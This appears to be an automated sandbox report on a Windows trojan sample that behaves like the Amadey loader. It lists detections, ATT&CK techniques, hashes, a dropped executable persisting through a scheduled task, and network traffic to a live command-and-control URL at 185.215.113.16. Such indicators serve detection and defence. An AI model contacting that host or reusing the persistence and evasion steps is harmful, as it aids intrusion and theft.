                    Source: Yara match File source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.2085839344.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.2044771326.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 224 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    [Behavior graph: ID 1483002, Sample: EXyAlLKIck.exe, Start date: 26/07/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    EXyAlLKIck.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    EXyAlLKIck.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://185.215.113.16/Jo89Ku7d/index.php32 | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/ | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpc | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpp; | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php= | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpy | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpZ | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpx | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpded | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpt | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php3 | 100% | Avira URL Cloud | phishing |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    206.23.85.13.in-addr.arpa | unknown | unknown | false | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: phishing | unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      185.215.113.16 | unknown | Portugal |  | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1483002
                      Start date and time:2024-07-26 13:42:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 57s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:EXyAlLKIck.exe
                      renamed because original name is a hash value
                      Original Sample Name:fddcf49860999a5147f34179c07c4bc6.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                      EGA Information:
                      • Successful, ratio: 25%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target EXyAlLKIck.exe, PID 3220 because it is empty
                      • Execution Graph export aborted for target axplong.exe, PID 5000 because there are no executed function
                      • Execution Graph export aborted for target axplong.exe, PID 728 because there are no executed function
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: EXyAlLKIck.exe
                      Time | Type | Description
                      07:44:01 | API Interceptor | 1007x Sleep call for process: axplong.exe modified
                      13:42:56 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      185.215.113.16 | IRqsWvBBMc.exe | Get hash | malicious | Amadey, Vidar | Browse | 185.215.113.16/Jo89Ku7d/index.php
                      185.215.113.16 | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 185.215.113.16/Jo89Ku7d/index.php
                      185.215.113.16 | JGKjBsQrMc.exe | Get hash | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | Browse | 185.215.113.16/Jo89Ku7d/index.php
                      185.215.113.16 | PE1dBCFKZv.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                      185.215.113.16 | random.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16/Jo89Ku7d/index.php
                      No context
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      WHOLESALECONNECTIONSNL | IRqsWvBBMc.exe | Get hash | malicious | Amadey, Vidar | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | LbMTyCFRzs.exe | Get hash | malicious | Amadey | Browse | 185.215.113.19
                      WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, Babadeda, Stealc, Vidar | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | DHBIT8FeuO.exe | Get hash | malicious | Amadey | Browse | 185.215.113.19
                      WHOLESALECONNECTIONSNL | JGKjBsQrMc.exe | Get hash | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | PE1dBCFKZv.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | random.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar | Browse | 185.215.113.16
                      WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | RedLine | Browse | 185.215.113.67
                      WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | RedLine | Browse | 185.215.113.67
                      No context
                      No context
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1878528
                      Entropy (8bit):7.9511790279672505
                      Encrypted:false
                      SSDEEP:49152:P5q5hwjJGpXZ/jHfZELr33caRxXTJ5MJRiNxEBm7HWdYOyMCoU1:swFGpXZjfZ+rnDxl5MJUxP2yG
                      MD5:FDDCF49860999A5147F34179C07C4BC6
                      SHA1:9272C4C84A44387FF0546C33F8816DE12E993D3D
                      SHA-256:0EC6F1E4EA70E94D4B6245ECB1CA8953515E41AD631AF0FBDAD75C2AB14C36E8
                      SHA-512:069E5D84F7E9058972C9D1BD6293435EA3EAC9814925C248F753BF35123B9C66B3A61A9F278000E5ECD7BEFD980345D076646B7D4F25EC8574D4D1D47A103075
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................J.....x.....@.................................W...k.............................J.............................p.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .`*.........................@...wfabfqoe......1.....................@...qxvdwait......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0
                      Process:C:\Users\user\Desktop\EXyAlLKIck.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):3.4418354476099817
                      Encrypted:false
                      SSDEEP:6:hFKsnX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0l1XyEt0:hMsXDQ1lOmeeDNfXV1CEt0
                      MD5:C542D68DA39ECA3C0F6F50A8686B79F3
                      SHA1:0BD14C692B72DEEDE72D586D3991DC2CC2ED13C0
                      SHA-256:285F6B060329C3A2E349CBE8690911D1D019DE12B8CB86003B2D1824090A26DB
                      SHA-512:E925B1E23D6E3F86D757B95E5959EF3DAC6A9C8E3E98FDC43B2409168348587080CF5E3D40BB7D332ED2D4A62E4A3071D48F035183C97CDC302128D157300797
                      Malicious:false
                      Reputation:low
                      Preview:...........M.,....C.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................+.@3P.........................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.9511790279672505
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:EXyAlLKIck.exe
                      File size:1'878'528 bytes
                      MD5:fddcf49860999a5147f34179c07c4bc6
                      SHA1:9272c4c84a44387ff0546c33f8816de12e993d3d
                      SHA256:0ec6f1e4ea70e94d4b6245ecb1ca8953515e41ad631af0fbdad75c2ab14c36e8
                      SHA512:069e5d84f7e9058972c9d1bd6293435ea3eac9814925c248f753bf35123b9c66b3a61a9f278000e5ecd7befd980345d076646b7d4f25ec8574d4d1d47a103075
                      SSDEEP:49152:P5q5hwjJGpXZ/jHfZELr33caRxXTJ5MJRiNxEBm7HWdYOyMCoU1:swFGpXZjfZ+rnDxl5MJUxP2yG
                      TLSH:EA9533124FB29B19DC6EF83E271BAF5869D4C5105C924FBD331841A8DDF3A5382F6A50
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x8ab000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a9cc0 | 0x10 | wfabfqoe
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x4a9c70 | 0x18 | wfabfqoe
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                       | 0x1000 | 0x68000 | 0x2de00 | b640ac6ffc6478af85df53e1cade5079 | False | 0.9973763198228883 | data | 7.982589984423413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x69000 | 0x1e0 | 0x200 | 64903977b780070f8d5c3f7ecceace36 | False | 0.578125 | data | 4.4757811155299025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                       | 0x6b000 | 0x2a6000 | 0x200 | ab8ba28d2a4157ea4e9e8c1f2873e1d0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      wfabfqoe | 0x311000 | 0x199000 | 0x199000 | 5c371e5c77c9a370e158837dbd7d0558 | False | 0.994585331028423 | data | 7.954564972616457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      qxvdwait | 0x4aa000 | 0x1000 | 0x400 | b4ec7f2bacab7015e5467775acfbef74 | False | 0.697265625 | data | 5.672679022019647 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x4ab000 | 0x3000 | 0x2200 | b50a2421a633ebb3255a8739c7fdcc6a | False | 0.06502757352941177 | DOS executable (COM) | 0.7147883333844974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_MANIFEST | 0x4a9cd0 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Language of compilation system | Country where language is spoken | Map
                      English | United States |
                      Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                      2024-07-26T13:44:21.031169+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 53662 | 80 | 192.168.2.5 | 185.215.113.16
                      2024-07-26T13:43:32.829875+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 53645 | 52.165.165.26 | 192.168.2.5
                      2024-07-26T13:43:14.534208+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49704 | 20.12.23.50 | 192.168.2.5
                      2024-07-26T13:44:27.104268+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 53667 | 80 | 192.168.2.5 | 185.215.113.16
                      2024-07-26T13:43:33.868995+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 53646 | 52.165.165.26 | 192.168.2.5
                      2024-07-26T13:44:03.059226+0200 | TCP | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 53647 | 80 | 192.168.2.5 | 185.215.113.16
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jul 26, 2024 13:44:12.999011993 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:12.999011993 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:12.999284029 CEST8053655185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:12.999511003 CEST5365580192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:13.005425930 CEST8053656185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:13.813911915 CEST8053656185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:13.813982010 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:13.814675093 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:13.826699018 CEST8053656185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.070489883 CEST8053656185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.070614100 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.180802107 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.181222916 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.189037085 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.189133883 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.189224005 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.189519882 CEST8053656185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.189569950 CEST5365680192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.197176933 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.946468115 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:14.946571112 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.947299957 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:14.952095985 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:15.200756073 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:15.201004982 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.305988073 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.306169987 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.311633110 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:15.311773062 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.311961889 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.313101053 CEST8053657185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:15.313169956 CEST5365780192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:15.320080996 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.117976904 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.118113041 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.118776083 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.123625040 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.517405987 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.517524004 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.633784056 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.634038925 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.641565084 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.643151999 CEST8053658185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:16.643260956 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.643260956 CEST5365880192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.643441916 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:16.648313999 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.400667906 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.400877953 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.401375055 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.409125090 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.661652088 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.662425041 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.774431944 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.774817944 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.779953003 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.780057907 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.780222893 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.780574083 CEST8053659185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:17.782419920 CEST5365980192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:17.785043955 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.545650959 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.545928001 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.546478033 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.551469088 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.798448086 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.798705101 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.899571896 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.899826050 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.934711933 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.934814930 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.934989929 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.938724041 CEST8053660185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:18.938803911 CEST5366080192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:18.942217112 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:19.691845894 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:19.691917896 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:19.694761038 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:19.701617002 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:19.945610046 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:19.946427107 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.057265043 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.060513020 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.250878096 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:20.250974894 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.251146078 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.251728058 CEST8053661185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:20.251769066 CEST5366180192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:20.258990049 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.031054974 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.031168938 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.039736032 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.046308041 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.316771984 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.317024946 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.431251049 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.431291103 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.440087080 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.440582037 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.440730095 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.444173098 CEST8053662185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:21.444557905 CEST5366280192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:21.450107098 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.227663994 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.227781057 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.228288889 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.235132933 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.486747026 CEST8053663185.215.113.16192.168.2.5
                      Jul 26, 2024 13:44:22.486928940 CEST5366380192.168.2.5185.215.113.16
                      Jul 26, 2024 13:44:22.602698088 CEST5366380192.168.2.5185.215.113.16
